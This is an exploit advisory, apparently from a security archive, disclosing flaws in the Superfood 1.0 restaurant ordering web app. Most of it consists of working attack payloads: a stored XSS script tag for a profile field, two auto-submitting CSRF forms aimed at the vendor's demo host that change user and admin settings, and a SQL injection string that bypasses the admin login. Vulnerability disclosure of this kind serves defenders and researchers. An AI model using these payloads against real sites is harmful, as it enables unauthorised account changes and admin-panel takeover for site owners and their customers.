Superfood 1.0 XSS / CSRF / SQL Injection

Superfood 1.0 XSS / CSRF / SQL Injection: Posted May 22, 2018; Authored by Borna Nematzadeh; Superfood Restaurants and Online Food Order System version 1.0 suffers from cross site request forgery, remote SQL injection, and cross site scripting vulnerabilities.; tags | exploit, remote, vulnerability, xss, sql injection, csrf; SHA-256 | 9ea77d6f5091364377c7abe1b464f4953aa4a318e3f5b052a0dbb16a0b044b32; Download | Favorite | View

Superfood 1.0 XSS / CSRF / SQL Injection

# Exploit Title:  Superfood - Restaurants & Online Food Order System  1.0 - Persistent cross site scripting / Cross site request forgery / Admin panel Authentication bypass
# Date: 2018-05-20
# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
# Vendor Homepage: https://codecanyon.net/item/superfood-restaurants-online-food-order-system/16855836?s_rank=30
# Version: 1.0
# Tested on: Kali linux
====================================================
# Description:
Superfood - Restaurants & Online Food Order System 1.0 suffers from multiple vulnerabilities :
====================================================
# POC 1 : Persistent cross site scripting :
1) After creating an account , go to your profile.
2) Navigate to "Update profile" and put this payload :
"/><script>alert('xss')</script>
3) You will have an alert box in the page .
====================================================
# POC 2 : CSRF :
Attacker can change user's authentication directly :
# User's CSRF exploit :
<html>
<head>
    <title>CSRF POC</title>
</head>
<body>
    <form action="http://restaurant.thesoftking.com/updateprofile"
method="post">
        <input type="hidden" name="name" value="anything">
        <input type="hidden" name="mobile" value="1000000000">
        <input type="hidden" name="address" value="anything">
    </form>
    <script>
        document.forms[0].submit();
    </script>
</body>
</html>
 
# Admin page CSRF exploit :
 
<form action="http://restaurant.thesoftking.com/admin/setgeneral.php"
method="post">
        <input name="name" value="exploit" type="hidden">
        <input name="wcmsg" value="test" type="hidden">
        <input name="address" value="test2" type="hidden">
        <input name="mobile" value="1000000" type="hidden">
        <input name="email" value="test@test.com" type="hidden">
        <input name="currency" value="decode" type="hidden">
</form>
    <script>
         document.forms[0].submit();
    </script>
====================================================
# POC 3 : Authentication bypass :
# Attacker can bypass admin panel without any authentication :
Path : /admin
Username : ' or 0=0 #
Password : anything
====================================================

Top Authors In Last 30 Days

Red Hat 179 files
Ubuntu 58 files
Debian 26 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
E1.Coders 4 files
malvuln 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Superfood 1.0 XSS / CSRF / SQL Injection

Superfood 1.0 XSS / CSRF / SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Superfood 1.0 XSS / CSRF / SQL Injection

Share This

Superfood 1.0 XSS / CSRF / SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems